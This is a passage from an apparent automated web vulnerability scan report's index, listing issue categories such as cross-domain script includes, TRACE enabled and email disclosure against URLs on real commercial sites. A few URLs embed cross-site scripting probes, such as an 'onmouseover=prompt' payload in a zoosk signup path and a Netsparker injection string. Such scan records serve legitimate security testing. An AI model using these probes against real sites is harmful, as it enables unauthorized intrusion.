18.39. http://www.townnews365.com/users/manage/

18.40. http://www.zoosk.com/d/dating2/35/

19. Source code disclosure

19.1. https://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab

19.2. http://www.99labels.com/v1/ScriptCombiner.axd

19.3. http://www.relianceconsumerfinance.com/Script/Calulation.js

19.4. http://www.vccircle.com/themes/vccircle/js/custom-functions.js

20. ASP.NET debugging enabled

21. Referer-dependent response

21.1. http://adserv.vccircle.com/www/delivery/afr.php

21.2. https://www.dropbox.com/apps

21.3. https://www.dropbox.com/apps/64/documents-to-go

21.4. https://www.dropbox.com/contact

21.5. https://www.dropbox.com/help

21.6. https://www.dropbox.com/register

21.7. https://www.dropbox.com/team/contact

21.8. http://www.facebook.com/extern/login_status.php

21.9. http://www.facebook.com/plugins/like.php

21.10. http://www.facebook.com/plugins/likebox.php

21.11. https://www.facebook.com/login.php

21.12. http://www.policybazaar.com/tracker.aspx

21.13. http://www.yatra.com/connect/www/content/afr.php

22. Cross-domain POST

22.1. http://appworld.blackberry.com/webstore/content/19736

22.2. http://buglight.org/News.htm

22.3. https://www.dropbox.com/team/contact

22.4. http://www.townnews.com/calendar/

22.5. http://www.townnews.com/calendar/

22.6. http://www.townnews365.com/content_management_solutions/

22.7. http://www.townnews365.com/content_management_solutions/

22.8. http://www.townnews365.com/content_management_solutions/about_blox/

22.9. http://www.townnews365.com/content_management_solutions/about_blox/

22.10. http://www.townnews365.com/content_management_solutions/blogs/article_1383ef06-772e-11e0-920f-001cc4c03286.html

22.11. http://www.townnews365.com/content_management_solutions/blogs/article_1383ef06-772e-11e0-920f-001cc4c03286.html

22.12. http://www.townnews365.com/content_management_solutions/calendar/

22.13. http://www.townnews365.com/content_management_solutions/calendar/

22.14. http://www.townnews365.com/content_management_solutions/calendar/image_9cb4a620-4418-11df-941f-001cc4c002e0.html

22.15. http://www.townnews365.com/content_management_solutions/calendar/image_9cb4a620-4418-11df-941f-001cc4c002e0.html

22.16. http://www.townnews365.com/content_management_solutions/image_63500bb8-441d-11df-b714-001cc4c002e0.html

22.17. http://www.townnews365.com/content_management_solutions/image_63500bb8-441d-11df-b714-001cc4c002e0.html

22.18. http://www.townnews365.com/content_management_solutions/murlinstats/

22.19. http://www.townnews365.com/content_management_solutions/murlinstats/

22.20. http://www.townnews365.com/content_management_solutions/murlinstats/image_69db35d0-4741-11df-ac75-001cc4c002e0.html

22.21. http://www.townnews365.com/content_management_solutions/murlinstats/image_69db35d0-4741-11df-ac75-001cc4c002e0.html

22.22. http://www.townnews365.com/content_management_solutions/news/

22.23. http://www.townnews365.com/content_management_solutions/news/

22.24. http://www.townnews365.com/content_management_solutions/polls/

22.25. http://www.townnews365.com/content_management_solutions/polls/

22.26. http://www.townnews365.com/content_management_solutions/topic_page/

22.27. http://www.townnews365.com/content_management_solutions/topic_page/

22.28. http://www.townnews365.com/content_management_solutions/user_services/

22.29. http://www.townnews365.com/content_management_solutions/user_services/

22.30. http://www.townnews365.com/distribution_solutions/rss_feeds/

22.31. http://www.townnews365.com/distribution_solutions/rss_feeds/

22.32. http://www.townnews365.com/e-mail_blast/features/subscribe/

22.33. http://www.townnews365.com/e-mail_blast/software_updates/subscribe/

22.34. http://www.townnews365.com/search/

22.35. http://www.townnews365.com/search/

22.36. http://www.townnews365.com/search/results/

22.37. http://www.townnews365.com/search/results/

22.38. http://www.townnews365.com/site/customers/

22.39. http://www.townnews365.com/site/customers/

22.40. http://www.townnews365.com/site/forms/

22.41. http://www.townnews365.com/site/forms/

22.42. http://www.townnews365.com/site/sales_team/

22.43. http://www.townnews365.com/site/sales_team/

22.44. http://www.townnews365.com/site/sales_team/

22.45. http://www.townnews365.com/site/sales_team/

22.46. http://www.townnews365.com/site/swat_team/

22.47. http://www.townnews365.com/site/swat_team/

22.48. http://www.townnews365.com/submissions/

22.49. http://www.townnews365.com/submissions/

22.50. http://www.townnews365.com/topic/

22.51. http://www.townnews365.com/topic/

22.52. http://www.townnews365.com/user-generated_solutions/user_account_contributions/

22.53. http://www.townnews365.com/user-generated_solutions/user_account_contributions/

22.54. http://www.townnews365.com/users/forgot/

22.55. http://www.townnews365.com/users/forgot/

22.56. http://www.townnews365.com/users/login/

22.57. http://www.townnews365.com/users/login/

22.58. http://www.townnews365.com/users/login/

22.59. http://www.townnews365.com/users/manage/

22.60. http://www.townnews365.com/users/manage/

22.61. http://www.vccircle.com/500/news/DWConfiguration/ActiveContent/IncludeFiles/AC_RunActiveContent.js

22.62. http://www.vccircle.com/news/DWConfiguration/ActiveContent/IncludeFiles/AC_RunActiveContent.js

22.63. http://www.vccircle.com/news/startups

23. Cross-domain Referer leakage

23.1. http://ad.doubleclick.net/adi/N3285.google/B2343920.121

23.2. http://ad.doubleclick.net/adj/india.reuters.com/widgets

23.3. http://ads.adsonar.com/adserving/getAds.jsp

23.4. http://bloximages.chicago2.vip.townnews.com/stowetoday.com/content/tncms/live/components/core_external_flowplayer/resources/scripts/flowplayer-3.1.4.min.js

23.5. http://careers.accenture.com/in-en/landing-pages/Pages/careers-at-accenture10.aspx

23.6. http://cm.g.doubleclick.net/pixel

23.7. http://cm.g.doubleclick.net/pixel

23.8. http://cm.g.doubleclick.net/pixel

23.9. http://googleads.g.doubleclick.net/pagead/ads

23.10. http://jobsearch.naukri.com/mynaukri/google/googleadsx_2.php

23.11. http://jobsearch.naukri.com/mynaukri/google/googleadsx_2.php

23.12. http://jobsearch.naukri.com/mynaukri/js_searchPlug.php

23.13. http://jobsearch.naukri.com/mynaukri/js_searchPlug.php

23.14. http://jobsearch.naukri.com/mynaukri/mn_newsmartsearch.php

23.15. http://jobsearch.naukri.com/mynaukri/mn_newsmartsearch.php

23.16. http://jobsearch.naukri.com/mynaukri/mn_newsmartsearch.php

23.17. http://jobsearch.naukri.com/mynaukri/mn_newsmartsearch.php

23.18. http://jobsearch.naukri.com/mynaukri/mn_newsmartsearch.php

23.19. http://jobsearch.naukri.com/mynaukri/mn_newsmartsearch.php

23.20. http://jobsearch.naukri.com/mynaukri/mn_newsmartsearch.php

23.21. http://jobsearch.naukri.com/mynaukri/mn_newsmartsearch.php

23.22. http://jobsearch.naukri.com/mynaukri/mn_newsmartsearch.php

23.23. http://jobsearch.naukri.com/mynaukri/mn_newsmartsearch.php

23.24. http://jobsearch.naukri.com/mynaukri/mn_newsmartsearch.php

23.25. http://knowledge.policybazaar.com/component/search/

23.26. https://login.naukri.com/nLogin/Login.php

23.27. https://login.zoosk.com/forgot.php

23.28. https://login.zoosk.com/login.php

23.29. https://login.zoosk.com/signup.php

23.30. http://my.naukri.com/manager/createacc2.php

23.31. http://my.naukri.com/manager/rm_uploadCV.php

23.32. http://static.naukimg.com/mobile/ms/includes/gm_js.js

23.33. http://w5.naukri.com/resbilling/main/rservices.php

23.34. http://www.99labels.com/v1/brand-items.aspx

23.35. http://www.facebook.com/plugins/like.php

23.36. http://www.facebook.com/plugins/like.php

23.37. http://www.facebook.com/plugins/like.php

23.38. http://www.facebook.com/plugins/likebox.php

23.39. http://www.facebook.com/plugins/likebox.php

23.40. http://www.facebook.com/register/fbconnect.php

23.41. http://www.google.com/url

23.42. http://www.google.com/url

23.43. http://www.google.com/url

23.44. http://www.google.com/url

23.45. http://www.google.com/url

23.46. http://www.google.com/url

23.47. http://www.naukri.com/mobile/internet.php

23.48. http://www.policybazaar.com/utility/road-assistance-quotes.aspx

23.49. http://www.townnews.com/search/

23.50. http://www.townnews.com/topic/

23.51. http://www.townnews365.com/search/results/

23.52. http://www.townnews365.com/topic/

23.53. http://www.townnews365.com/user-generated_solutions/user_account_contributions/

23.54. http://www.townnews365.com/user-generated_solutions/user_account_contributions/

23.55. http://www.townnews365.com/users/login-success/

23.56. http://www.townnews365.com/users/login/

24. Cross-domain script include

24.1. http://ad.doubleclick.net/adi/N3285.google/B2343920.121

24.2. https://adsafecontrol.com/js/seedrandom.js

24.3. http://adsafeprotected.com/

24.4. http://adsafeprotected.com/products_network_control.php

24.5. http://blogs.naukri.com/

24.6. http://blogs.vccircle.com/

24.7. http://bloxcms.com/

24.8. http://buglight.org/News.htm

24.9. http://code.google.com/p/swfobject/

24.10. http://code.google.com/p/swfobject/wiki/SWFObject_2_0_documentation

24.11. http://dealcurry.com/20110421-PolicyBazaar-Com-Raises-Rs-40-Cr-From-Intel-Cap-Info-Edge.htm

24.12. http://dealcurry.com/VentureCapital.htm

24.13. http://dean.edwards.name/weblog/2006/06/again/

24.14. http://googleads.g.doubleclick.net/pagead/ads

24.15. http://jobsearch.naukri.com/

24.16. http://jobsearch.naukri.com/accounting-jobs/

24.17. http://jobsearch.naukri.com/architects-designers/

24.18. http://jobsearch.naukri.com/automobile-jobs/

24.19. http://jobsearch.naukri.com/browse-Chandigarh-a-jobs-career-india

24.20. http://jobsearch.naukri.com/browse-Gurgaon-a-jobs-career-india

24.21. http://jobsearch.naukri.com/browse-Noida-a-jobs-career-india

24.22. http://jobsearch.naukri.com/callcenter-ites-jobs/

24.23. http://jobsearch.naukri.com/construction-engg-jobs/

24.24. http://jobsearch.naukri.com/consultant-entrepreneur/

24.25. http://jobsearch.naukri.com/content-journalism/

24.26. http://jobsearch.naukri.com/corporate-planning/

24.27. http://jobsearch.naukri.com/current-walkins/

24.28. http://jobsearch.naukri.com/export-import/

24.29. http://jobsearch.naukri.com/fashion-garments/

24.30. http://jobsearch.naukri.com/information-technology-jobs/

24.31. http://jobsearch.naukri.com/mynaukri/js_company.php

24.32. http://jobsearch.naukri.com/mynaukri/js_enable.php

24.33. http://jobsearch.naukri.com/mynaukri/js_msngr.php

24.34. http://jobsearch.naukri.com/mynaukri/mn_newsmartsearch.php

24.35. http://knowledge.policybazaar.com/car-insurance.html

24.36. http://knowledge.policybazaar.com/component/search/

24.37. http://knowledge.policybazaar.com/health-insurance.html

24.38. http://knowledge.policybazaar.com/knowledge-base.html

24.39. http://knowledge.policybazaar.com/knowledge-base/item/263-how-to-avail-tax-benefits-through-insurance.html

24.40. http://knowledge.policybazaar.com/life-insurance.html

24.41. http://knowledge.policybazaar.com/loan.html

24.42. http://knowledge.policybazaar.com/loan/item/283-what-are-the-documents-required-for-personal-loan

24.43. http://login.naukri.com/nLogin/Login.php

24.44. https://login.naukri.com/nLogin/Login.php

24.45. https://login.zoosk.com/forgot.php

24.46. https://login.zoosk.com/login.php

24.47. https://login.zoosk.com/signup.php

24.48. https://login.zoosk.com/signup.php/%22onmouseover=prompt%28980185%29%3E

24.49. http://my.naukri.com/PayCheck/salary

24.50. http://my.naukri.com/faq/faq.php

24.51. http://my.naukri.com/jobTools/web/tools.php/PayCheck/salary

24.52. http://my.naukri.com/manager/createacc2.php

24.53. http://st-www2.stowetoday.com/calendar_box

24.54. http://static.naukimg.com/jobsrch/js/nl_28042011.js

24.55. http://static.reuters.com/resources/media/editorial/20080811/deals-widget.html

24.56. http://techcircle.vccircle.com/500/policybazaar-com-raises-rs-10-crore-from-info-edge-to-close-rs-30-crore-from-intel-capital-shortly/

24.57. https://townnews365-dot-com.bloxcms.com/users/login/

24.58. http://w5.naukri.com/fdbck/main/feedback.php

24.59. http://w5.naukri.com/resbilling/main/ms_compaign5.php

24.60. http://w5.naukri.com/resbilling/main/ms_misc.php

24.61. http://w5.naukri.com/resbilling/main/ms_resume-booster.php

24.62. http://w5.naukri.com/resbilling/main/res-contact.php

24.63. http://w5.naukri.com/resbilling/main/rservices.php

24.64. http://www.99labels.com/v1/brand-items.aspx

24.65. http://www.99labels.com/v1/index.aspx

24.66. http://www.99labels.com/v1/xd_receiver.htm

24.67. http://www.addthis.com/bookmark.php

24.68. http://www.facebook.com/plugins/like.php

24.69. http://www.facebook.com/plugins/likebox.php

24.70. http://www.facebook.com/register/fbconnect.php

24.71. http://www.facebook.com/zooskdating

24.72. https://www.google.com/adsense/support/bin/request.py

24.73. http://www.linkedin.com/company/sapientnitro

24.74. http://www.markosweb.com/www/policybazaar.com/

24.75. http://www.naukri.com/

24.76. http://www.naukri.com/mobile/blackberry.php

24.77. http://www.naukri.com/mobile/internet.php

24.78. http://www.naukri.com/mobile/sms.php

24.79. http://www.naukri.com/mynaukri/mn_contactus.php

24.80. http://www.policybazaar.com/Default.aspx

24.81. http://www.policybazaar.com/agentregister.aspx

24.82. http://www.policybazaar.com/life-insurance/pension-insurance-india.aspx

24.83. http://www.policybazaar.com/life-insurance/term-insurance-india.aspx

24.84. http://www.policybazaar.com/utility/road-assistance-quotes.aspx

24.85. http://www.policybazaar.com/utility/road-assistance-quotes.aspx/%22ns=%22netsparker(0x00207F)

24.86. http://www.quora.com/

24.87. http://www.stowetoday.com/

24.88. http://www.stowetoday.com/content/

24.89. http://www.stowetoday.com/favicon.ico

24.90. http://www.stowetoday.com/stowe_reporter/news/business_news/article_df77e6de-7cac-11e0-93f2-001cc4c03286.html

24.91. http://www.townnews.com/

24.92. http://www.townnews.com/advertising_solutions/

24.93. http://www.townnews.com/advertising_solutions/ad_creation/

24.94. http://www.townnews.com/advertising_solutions/banner_ads/

24.95. http://www.townnews.com/advertising_solutions/business_directory/

24.96. http://www.townnews.com/advertising_solutions/top_ads/

24.97. http://www.townnews.com/advertising_solutions/yellow_pages/

24.98. http://www.townnews.com/advertising_solutions/yp_top_ads/

24.99. http://www.townnews.com/art/e-mail_blast/facebook.png/

24.100. http://www.townnews.com/calendar/

24.101. http://www.townnews.com/calendar/asset_manager/event_f229e406-7506-11e0-b056-001cc4c03286.html

24.102. http://www.townnews.com/calendar/banner_ad_manager/event_0cadbf96-771e-11e0-855c-001cc4c03286.html

24.103. http://www.townnews.com/calendar/block_manager/event_6b09396c-771e-11e0-aa14-001cc4c03286.html

24.104. http://www.townnews.com/calendar/blox_open_forum/event_5f70e8b0-7585-11e0-a366-001cc4c03286.html

24.105. http://www.townnews.com/calendar/business_directory_manager/event_d4277864-771e-11e0-9945-001cc4c03286.html

24.106. http://www.townnews.com/calendar/calendar_manager/event_99507602-7505-11e0-b7e6-001cc4c03286.html

24.107. http://www.townnews.com/calendar/classifieds_manager/event_429ce008-7586-11e0-a258-001cc4c03286.html

24.108. http://www.townnews.com/calendar/eeditions_manager/event_59ea672e-7506-11e0-98f0-001cc4c03286.html

24.109. http://www.townnews.com/calendar/forms_manager/event_35e7e05c-771f-11e0-85e0-001cc4c03286.html

24.110. http://www.townnews.com/calendar/user_comment_manager/event_d43a9588-7585-11e0-90c0-001cc4c03286.html

24.111. http://www.townnews.com/classified_solutions/

24.112. http://www.townnews.com/classified_solutions/ad-market/

24.113. http://www.townnews.com/classified_solutions/employment_solutions/

24.114. http://www.townnews.com/classified_solutions/real_estate_solutions/

24.115. http://www.townnews.com/content_management_solutions/

24.116. http://www.townnews.com/content_management_solutions/blogs/

24.117. http://www.townnews.com/content_management_solutions/blogs/article_1383ef06-772e-11e0-920f-001cc4c03286.html

24.118. http://www.townnews.com/content_management_solutions/blogs/article_2c56c9b2-7cb1-11e0-b539-001cc4c002e0.html

24.119. http://www.townnews.com/content_management_solutions/blogs/article_4738d32c-6c28-11e0-b50d-001cc4c03286.html

24.120. http://www.townnews.com/content_management_solutions/blogs/article_80830252-71b3-11e0-8711-001cc4c03286.html

24.121. http://www.townnews.com/content_management_solutions/blogs/article_ee26dd4e-6c25-11e0-afd7-001cc4c03286.html

24.122. http://www.townnews.com/content_management_solutions/blogs/article_fbdf3574-66aa-11e0-8fe8-001cc4c002e0.html

24.123. http://www.townnews.com/content_management_solutions/blogs/gary_sosniecki/article_c3586b30-66aa-11e0-b61e-001cc4c002e0.html

24.124. http://www.townnews.com/content_management_solutions/blogs/marc_wilson/article_96e40a38-6122-11e0-88b0-001cc4c002e0.html

24.125. http://www.townnews.com/content_management_solutions/blogs/marc_wilson/article_9789c9b2-66a6-11e0-a6fe-001cc4c002e0.html

24.126. http://www.townnews.com/content_management_solutions/calendar/

24.127. http://www.townnews.com/content_management_solutions/murlinstats/

24.128. http://www.townnews.com/content_management_solutions/news/

24.129. http://www.townnews.com/content_management_solutions/news/article_f24fce56-7c9e-11e0-809c-001cc4c002e0.html

24.130. http://www.townnews.com/content_management_solutions/polls/

24.131. http://www.townnews.com/content_management_solutions/reader_commenting/

24.132. http://www.townnews.com/content_management_solutions/topic_page/

24.133. http://www.townnews.com/content_solutions/

24.134. http://www.townnews.com/content_solutions/financial_news/

24.135. http://www.townnews.com/content_solutions/stock_ticker/

24.136. http://www.townnews.com/content_solutions/weather/

24.137. http://www.townnews.com/creatives_solutions/

24.138. http://www.townnews.com/creatives_solutions/ad_creation/

24.139. http://www.townnews.com/creatives_solutions/circulars/

24.140. http://www.townnews.com/creatives_solutions/enhanced_special_sections/

24.141. http://www.townnews.com/distribution_solutions/

24.142. http://www.townnews.com/distribution_solutions/e-editions/

24.143. http://www.townnews.com/distribution_solutions/e-editions/demonstration/

24.144. http://www.townnews.com/distribution_solutions/enhanced_special_sections/

24.145. http://www.townnews.com/distribution_solutions/mailing_list/

24.146. http://www.townnews.com/distribution_solutions/mobile_sites/

24.147. http://www.townnews.com/distribution_solutions/rss_feeds/

24.148. http://www.townnews.com/distribution_solutions/special_sections_via_e-editions/

24.149. http://www.townnews.com/marketplace/business_434b7195-75b6-5eb4-bb91-74beeb7a6ba6.html

24.150. http://www.townnews.com/multimedia_solutions/

24.151. http://www.townnews.com/multimedia_solutions/enhanced_video/

24.152. http://www.townnews.com/multimedia_solutions/photo_gallery/

24.153. http://www.townnews.com/multimedia_solutions/standard_video/

24.154. http://www.townnews.com/search/

24.155. http://www.townnews.com/shopping_solutions/

24.156. http://www.townnews.com/shopping_solutions/yellow_pages/

24.157. http://www.townnews.com/shopping_solutions/yp_top_ads/

24.158. http://www.townnews.com/site/about/

24.159. http://www.townnews.com/site/affiliates/

24.160. http://www.townnews.com/site/careers/

24.161. http://www.townnews.com/site/careers/article_1f9ad1d8-9fcf-11df-9247-001cc4c03286.html

24.162. http://www.townnews.com/site/careers/article_292d5bac-90e4-11df-9249-001cc4c03286.html

24.163. http://www.townnews.com/site/contact/

24.164. http://www.townnews.com/site/customers/

24.165. http://www.townnews.com/site/forms/

24.166. http://www.townnews.com/site/sales_team/

24.167. http://www.townnews.com/site/site_index/

24.168. http://www.townnews.com/site/site_launches/article_59ec092c-7d7a-11e0-a745-001cc4c002e0.html

24.169. http://www.townnews.com/site/site_launches/article_dedd058e-6ac2-11e0-a2ee-001cc4c03286.html

24.170. http://www.townnews.com/site/site_submissions/

24.171. http://www.townnews.com/site/speakers_bureau/

24.172. http://www.townnews.com/site/swat_team/

24.173. http://www.townnews.com/submissions/

24.174. http://www.townnews.com/topic/

24.175. http://www.townnews.com/user-generated_solutions/

24.176. http://www.townnews.com/user-generated_solutions/calendar/

24.177. http://www.townnews.com/user-generated_solutions/enhanced_video/

24.178. http://www.townnews.com/user-generated_solutions/user_account_contributions/

24.179. http://www.townnews.com/users/admin/calendar/event/

24.180. http://www.townnews365.com/classified_solutions/pdf_display_ad_converter/demonstration

24.181. http://www.townnews365.com/content/tncms/live/

24.182. http://www.townnews365.com/content_management_solutions/

24.183. http://www.townnews365.com/content_management_solutions/about_blox

24.184. http://www.townnews365.com/content_management_solutions/about_blox/

24.185. http://www.townnews365.com/content_management_solutions/blogs/article_1383ef06-772e-11e0-920f-001cc4c03286.html

24.186. http://www.townnews365.com/content_management_solutions/calendar

24.187. http://www.townnews365.com/content_management_solutions/calendar/

24.188. http://www.townnews365.com/content_management_solutions/calendar/demonstration

24.189. http://www.townnews365.com/content_management_solutions/calendar/image_9cb4a620-4418-11df-941f-001cc4c002e0.html

24.190. http://www.townnews365.com/content_management_solutions/image_63500bb8-441d-11df-b714-001cc4c002e0.html

24.191. http://www.townnews365.com/content_management_solutions/murlinstats

24.192. http://www.townnews365.com/content_management_solutions/murlinstats/

24.193. http://www.townnews365.com/content_management_solutions/murlinstats/image_69db35d0-4741-11df-ac75-001cc4c002e0.html

24.194. http://www.townnews365.com/content_management_solutions/news/

24.195. http://www.townnews365.com/content_management_solutions/polls/

24.196. http://www.townnews365.com/content_management_solutions/publishers_column

24.197. http://www.townnews365.com/content_management_solutions/reader_commenting/

24.198. http://www.townnews365.com/content_management_solutions/topic_page/

24.199. http://www.townnews365.com/content_management_solutions/user_services/

24.200. http://www.townnews365.com/distribution_solutions/rss_feeds/

24.201. http://www.townnews365.com/e-mail_blast/features/subscribe/

24.202. http://www.townnews365.com/e-mail_blast/publishers/subscribe

24.203. http://www.townnews365.com/e-mail_blast/software_updates/subscribe/

24.204. http://www.townnews365.com/mobile

24.205. http://www.townnews365.com/mobile/

24.206. http://www.townnews365.com/search/

24.207. http://www.townnews365.com/search/results/

24.208. http://www.townnews365.com/site/customers/

24.209. http://www.townnews365.com/site/forms/

24.210. http://www.townnews365.com/site/sales_team/

24.211. http://www.townnews365.com/site/swat_team/

24.212. http://www.townnews365.com/submissions/

24.213. http://www.townnews365.com/topic/

24.214. http://www.townnews365.com/user-generated_solutions/calendar/demonstration

24.215. http://www.townnews365.com/user-generated_solutions/user_account_contributions/

24.216. http://www.townnews365.com/users/forgot/

24.217. http://www.townnews365.com/users/login-success/

24.218. http://www.townnews365.com/users/login/

24.219. http://www.townnews365.com/users/manage/

24.220. http://www.vccircle.com/500/news/DWConfiguration/ActiveContent/IncludeFiles/AC_RunActiveContent.js

24.221. http://www.vccircle.com/news/DWConfiguration/ActiveContent/IncludeFiles/AC_RunActiveContent.js

24.222. http://www.vccircle.com/news/startups

24.223. http://www.zoosk.com/d/dating2/35/

24.224. http://xss.cx/

25. File upload functionality

25.1. http://my.naukri.com/manager/rm_uploadCV.php

25.2. http://w5.naukri.com/fdbck/main/feedback.php

25.3. http://www.policybazaar.com/Personal-Loan/UploadDoc.aspx

25.4. http://www.townnews.com/shared-content/perform/

26. TRACE method is enabled

26.1. http://72.32.240.4/

26.2. http://adsafeprotected.com/

26.3. http://adserv.vccircle.com/

26.4. http://bh.contextweb.com/

26.5. http://blogs.vccircle.com/

26.6. http://brothercake.com/

26.7. http://campaigns.interactiveuniversal.in/

26.8. http://dealcurry.com/

26.9. http://dean.edwards.name/

26.10. http://events.vccircle.com/

26.11. http://hbsr.com/

26.12. http://pixel.rubiconproject.com/

26.13. http://pixel.traveladvertising.com/

26.14. http://secure-us.imrworldwide.com/

26.15. http://srv.clickfuse.com/

26.16. http://static.reuters.com/

26.17. http://techcircle.vccircle.com/

26.18. http://www.addthis.com/

26.19. http://www.blackberry.com/

26.20. http://www.classesandcareers.com/

26.21. http://www.hbsr.com/

26.22. https://www.kotakcards.com/

26.23. http://www.vccedge.com/

26.24. http://www.vccircle.com/

26.25. http://www.vizury.com/

26.26. https://www.vizury.com/

26.27. http://yads.zedo.com/

27. Email addresses disclosed

27.1. https://adsafecontrol.com/js/jqGrid/jquery.jqGrid.min.js

27.2. https://adsafecontrol.com/js/jqModal.js

27.3. https://adsafecontrol.com/scripts/controls.js

27.4. https://adsafecontrol.com/scripts/dragdrop.js

27.5. https://adsafecontrol.com/styles/adsafe/jqModal.css

27.6. http://adsafeprotected.com/js/carousel-tabs.js

27.7. http://bloximages.chicago2.vip.townnews.com/stowetoday.com/content/tncms/live/components/core_commenting/resources/scripts/commenting.js

27.8. http://bloximages.chicago2.vip.townnews.com/stowetoday.com/content/tncms/live/components/core_external_flowplayer/resources/scripts/flowplayer.playlist-3.0.7.min.js

27.9. http://bloximages.chicago2.vip.townnews.com/stowetoday.com/content/tncms/live/editorial/editorial-core-base/resources/scripts/cookie.js

27.10. http://bloximages.chicago2.vip.townnews.com/townnews365.com/content/tncms/live/editorial/editorial-core-base/resources/scripts/cookie.js

27.11. http://bloximages.chicago2.vip.townnews.com/townnews365.com/content/tncms/live/editorial/editorial-core-wrapper-company/resources/scripts/cookie.js

27.12. http://buglight.org/Contact.htm

27.13. http://buglight.org/News.htm

27.14. http://campaigns.interactiveuniversal.in/tata_aig_lp/index.php

27.15. http://code.google.com/p/swfobject/

27.16. http://code.google.com/p/swfobject/wiki/SWFObject_2_0_documentation

27.17. http://cwe.mitre.org/data/definitions/16.html

27.18. http://d1zlmuwse3cba4.cloudfront.net/-f79f52c66f019a07.js

27.19. http://dean.edwards.name/weblog/2006/06/again/

27.20. http://expbase.com/

27.21. http://jobsearch.naukri.com/automobile-jobs/

27.22. http://jobsearch.naukri.com/browse-Chandigarh-a-jobs-career-india

27.23. http://jobsearch.naukri.com/corporate-planning/

27.24. https://login.zoosk.com/signup.php

27.25. https://login.zoosk.com/signup.php/%22onmouseover=prompt%28980185%29%3E

27.26. http://nmp.newsgator.com/NGBUZZ/3656/load.ashx/buzz

27.27. http://nmp.newsgator.com/NGBUZZ/load.ashx/toolbar

27.28. http://static.naukimg.com/manager/js/page1_validation-04-05-2011.js

27.29. http://w5.naukri.com/resbilling/main/res-contact.php

27.30. http://widgets.twimg.com/j/2/widget.css

27.31. http://widgets.twimg.com/j/2/widget.js

27.32. http://www.99labels.com/v1/DeliveryPolicy.aspx

27.33. http://www.99labels.com/v1/brand-items.aspx

27.34. http://www.naukri.com/mobile/sms.php

27.35. http://www.naukri.com/mynaukri/mn_contactus.php

27.36. http://www.stowetoday.com/

27.37. http://www.stowetoday.com/content/

27.38. http://www.stowetoday.com/favicon.ico

27.39. http://www.stowetoday.com/stowe_reporter/news/business_news/article_df77e6de-7cac-11e0-93f2-001cc4c03286.html

27.40. http://www.townnews.com/

27.41. http://www.townnews.com/advertising_solutions/

27.42. http://www.townnews.com/advertising_solutions/ad_creation/

27.43. http://www.townnews.com/advertising_solutions/banner_ads/

27.44. http://www.townnews.com/advertising_solutions/business_directory/

27.45. http://www.townnews.com/advertising_solutions/top_ads/

27.46. http://www.townnews.com/advertising_solutions/yellow_pages/

27.47. http://www.townnews.com/advertising_solutions/yp_top_ads/

27.48. http://www.townnews.com/art/e-mail_blast/facebook.png/

27.49. http://www.townnews.com/calendar/

27.50. http://www.townnews.com/calendar/asset_manager/event_f229e406-7506-11e0-b056-001cc4c03286.html

27.51. http://www.townnews.com/calendar/banner_ad_manager/event_0cadbf96-771e-11e0-855c-001cc4c03286.html

27.52. http://www.townnews.com/calendar/block_manager/event_6b09396c-771e-11e0-aa14-001cc4c03286.html

27.53. http://www.townnews.com/calendar/blox_open_forum/event_5f70e8b0-7585-11e0-a366-001cc4c03286.html

27.54. http://www.townnews.com/calendar/business_directory_manager/event_d4277864-771e-11e0-9945-001cc4c03286.html

27.55. http://www.townnews.com/calendar/calendar_manager/event_99507602-7505-11e0-b7e6-001cc4c03286.html

27.56. http://www.townnews.com/calendar/classifieds_manager/event_429ce008-7586-11e0-a258-001cc4c03286.html

27.57. http://www.townnews.com/calendar/eeditions_manager/event_59ea672e-7506-11e0-98f0-001cc4c03286.html

27.58. http://www.townnews.com/calendar/forms_manager/event_35e7e05c-771f-11e0-85e0-001cc4c03286.html

27.59. http://www.townnews.com/calendar/user_comment_manager/event_d43a9588-7585-11e0-90c0-001cc4c03286.html

27.60. http://www.townnews.com/classified_solutions/

27.61. http://www.townnews.com/classified_solutions/ad-market/

27.62. http://www.townnews.com/classified_solutions/employment_solutions/

27.63. http://www.townnews.com/classified_solutions/real_estate_solutions/

27.64. http://www.townnews.com/content_management_solutions/

27.65. http://www.townnews.com/content_management_solutions/blogs/

27.66. http://www.townnews.com/content_management_solutions/blogs/article_1383ef06-772e-11e0-920f-001cc4c03286.html

27.67. http://www.townnews.com/content_management_solutions/blogs/article_2c56c9b2-7cb1-11e0-b539-001cc4c002e0.html

27.68. http://www.townnews.com/content_management_solutions/blogs/article_4738d32c-6c28-11e0-b50d-001cc4c03286.html

27.69. http://www.townnews.com/content_management_solutions/blogs/article_80830252-71b3-11e0-8711-001cc4c03286.html

27.70. http://www.townnews.com/content_management_solutions/blogs/article_ee26dd4e-6c25-11e0-afd7-001cc4c03286.html

27.71. http://www.townnews.com/content_management_solutions/blogs/article_fbdf3574-66aa-11e0-8fe8-001cc4c002e0.html

27.72. http://www.townnews.com/content_management_solutions/blogs/gary_sosniecki/article_c3586b30-66aa-11e0-b61e-001cc4c002e0.html

27.73. http://www.townnews.com/content_management_solutions/blogs/marc_wilson/article_96e40a38-6122-11e0-88b0-001cc4c002e0.html

27.74. http://www.townnews.com/content_management_solutions/blogs/marc_wilson/article_9789c9b2-66a6-11e0-a6fe-001cc4c002e0.html

27.75. http://www.townnews.com/content_management_solutions/calendar/

27.76. http://www.townnews.com/content_management_solutions/murlinstats/

27.77. http://www.townnews.com/content_management_solutions/news/

27.78. http://www.townnews.com/content_management_solutions/news/article_f24fce56-7c9e-11e0-809c-001cc4c002e0.html

27.79. http://www.townnews.com/content_management_solutions/polls/

27.80. http://www.townnews.com/content_management_solutions/reader_commenting/

27.81. http://www.townnews.com/content_management_solutions/topic_page/

27.82. http://www.townnews.com/content_solutions/

27.83. http://www.townnews.com/content_solutions/financial_news/

27.84. http://www.townnews.com/content_solutions/stock_ticker/

27.85. http://www.townnews.com/content_solutions/weather/

27.86. http://www.townnews.com/creatives_solutions/

27.87. http://www.townnews.com/creatives_solutions/ad_creation/

27.88. http://www.townnews.com/creatives_solutions/circulars/

27.89. http://www.townnews.com/creatives_solutions/enhanced_special_sections/

27.90. http://www.townnews.com/distribution_solutions/

27.91. http://www.townnews.com/distribution_solutions/e-editions/

27.92. http://www.townnews.com/distribution_solutions/e-editions/demonstration/

27.93. http://www.townnews.com/distribution_solutions/enhanced_special_sections/

27.94. http://www.townnews.com/distribution_solutions/mailing_list/

27.95. http://www.townnews.com/distribution_solutions/mobile_sites/

27.96. http://www.townnews.com/distribution_solutions/rss_feeds/

27.97. http://www.townnews.com/distribution_solutions/special_sections_via_e-editions/

27.98. http://www.townnews.com/marketplace/business_434b7195-75b6-5eb4-bb91-74beeb7a6ba6.html

